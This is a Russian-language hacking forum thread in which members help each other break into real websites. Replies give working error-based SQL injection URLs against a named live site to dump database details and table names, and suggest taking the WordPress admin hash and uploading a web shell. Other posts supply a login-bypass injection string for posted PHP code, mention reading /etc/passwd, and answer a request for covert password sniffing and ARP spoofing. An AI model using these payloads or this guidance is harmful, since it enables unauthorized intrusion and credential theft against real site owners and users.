Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    842
    Likes Received:
    170
    Reputations:
    84
    так не люблю :eek:
     
  2. DJ ][akep

    DJ ][akep Member

    Joined:
    27 Jan 2008
    Messages:
    93
    Likes Received:
    20
    Reputations:
    1
    Ребят подскажите пожалуйста где находятся конфиги доступа бд в vbulletin 3.3

    UPD: нашел ) Includes/config.php
     
    #20602 DJ ][akep, 20 Jun 2012
    Last edited: 20 Jun 2012
  3. trololoman96

    trololoman96 Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    120
    Likes Received:
    34
    Reputations:
    55
    Есть инъекция с читалкой файлов, нашел там раскрытие путей, но не могу прочитать этот файл, хотя он точно существует, зато могу прочитать /etc/passwd, апачевский конфиг. В конфиге нашел
    PHP:
    # DocumentRoot: The directory out of which you will serve your
    # documents. By default, all requests are taken from this directory, but
    # symbolic links and aliases may be used to point to other locations.
    #
    DocumentRoot "/var/www/html"

    ...

    # This should be changed to whatever you set DocumentRoot to.
    #
    <Directory "/var/www/html">
    Описаний виртуальных хостов я там не нашел. В раскритии путь выглядит иначе
    PHP:
    /home/site/public_html/music/p.php
    Где правду искать ?
     
  4. CyberKillerz

    CyberKillerz New Member

    Joined:
    19 Jun 2012
    Messages:
    23
    Likes Received:
    0
    Reputations:
    -5
    Есть инъекция даже не 1 немогу шелл залить помогите плиз
    http://wow.igrosfera.net/acp/index.php?modul=static&id=3
     
  5. trololoman96

    trololoman96 Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    120
    Likes Received:
    34
    Reputations:
    55
    Ну ты и наркоман, сам то читал что написал ?) Скуля твоя крутится как еррор басед без проблем
    Code:
    http://wow.igrosfera.net/acp/index.php?modul=static&id=3+or+1+group+by+concat%28%28select+concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29%29,0x3a,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+
    
    там есть доступ к куче бд, походу ко всем что крутится на этом сервере, на одном из поддоменов крутится вордпресс бложек, понел к чему я веду ?
     
  6. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Code:
    http://wow.igrosfera.net/acp/index.php?modul=static&id=3+and+extractvalue(1,(select+concat(0x2a,(select+table_name+from+information_schema.tables+where+table_schema!='information_schema'+limit+0,1))))
    
     
  7. CyberKillerz

    CyberKillerz New Member

    Joined:
    19 Jun 2012
    Messages:
    23
    Likes Received:
    0
    Reputations:
    -5
    Хм ты намекаешь на его уязвимость ? я просто начинающий )
     
  8. smirk

    smirk Elder - Старейшина

    Joined:
    8 Sep 2011
    Messages:
    137
    Likes Received:
    43
    Reputations:
    26
    он намекает, чтоб ты вытащил логин и хеш админа вордпресса и через этот блог залил шелл...
     
  9. CyberKillerz

    CyberKillerz New Member

    Joined:
    19 Jun 2012
    Messages:
    23
    Likes Received:
    0
    Reputations:
    -5
    а ни кто не поможет с брутом а то у мну с ним постоянная проблема ))
     
  10. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    брут чего? хеша? есть раздел выше про расшифровку хеша, запости туда свой хеш и надейся ,что его расшифруют
     
    _________________________
  11. Metho

    Metho New Member

    Joined:
    18 Nov 2011
    Messages:
    182
    Likes Received:
    2
    Reputations:
    0
    Что обычно находится в папках includes?
    В связи с чем задаю вопрос -
    Есть раскрученный блинд, есть фулл доступ к поддомену. Но надо сам домен. В инклайдс шелл. В админку мейна не заходит из данных бд, только в кабинет на отдельном сайте поддомене.
     
  12. CyberKillerz

    CyberKillerz New Member

    Joined:
    19 Jun 2012
    Messages:
    23
    Likes Received:
    0
    Reputations:
    -5
    как монжно обойти авторизацию ?

    <?php
    if (isset($_POST['auth_name'])) {
    $par= SHA1(strtoupper($_POST['auth_name']).':'.strtoupper($_POST['auth_pass']));
    $cont = mysql_connect($r_ip, $r_userdb, $r_pw);
    mysql_select_db($r_db, $cont);
    mysql_query("SET NAMES '$encoding'");
    $res = mysql_query('SELECT * FROM `account` WHERE `username`="'.$_POST['auth_name'].'" AND sha_pass_hash ="'.$par.'"') or trigger_error(mysql_error());
     
  13. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    917
    Likes Received:
    492
    Reputations:
    724
    В качестве имени отправить инъекцию.
    Что-то вроде '+OR+1=1+--+
     
    _________________________
  14. CyberKillerz

    CyberKillerz New Member

    Joined:
    19 Jun 2012
    Messages:
    23
    Likes Received:
    0
    Reputations:
    -5
    как я понял эт онажо добавить после логина ? я попытался чтото н еочень успешно
     
    #20614 CyberKillerz, 22 Jun 2012
    Last edited: 22 Jun 2012
  15. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    to CyberKillerz
    PHP:
    admin'" or "'1'"="'1#
     
  16. Jorge_

    Jorge_ New Member

    Joined:
    30 Dec 2008
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Решено.
     
    #20616 Jorge_, 22 Jun 2012
    Last edited: 22 Nov 2012
  17. lucky_dom

    lucky_dom New Member

    Joined:
    2 Jun 2012
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    доброго времени суток всем.
    имеется сервер 2003 r2 необходимо организовать скрытый снифинг с дальнейшей возможностью извлечения паролей из https соединения и др.защищенных протоколов. Подскажите инструментарий.желательно консольный.под винд.

    на сервере 2сетевухи одна смотрит в лан а вторая в нет.насколько я понял все пакеты идут через него.

    а так же интересует инструментарий по проведению апр спуфинга тоже консольный и скрытый.
     
    #20617 lucky_dom, 22 Jun 2012
    Last edited: 22 Jun 2012
  18. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    задавая вопрос, подумай какой будет ответ....а что тебе нужно?
     
    _________________________
    1 person likes this.
  19. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,185
    Likes Received:
    618
    Reputations:
    690
    2lucky_dom попробуй Intercepter-NG http://sniff.su/
     
    _________________________
  20. Jorge_

    Jorge_ New Member

    Joined:
    30 Dec 2008
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Конечно же, залить полноценный шелл.
     
Thread Status:
Not open for further replies.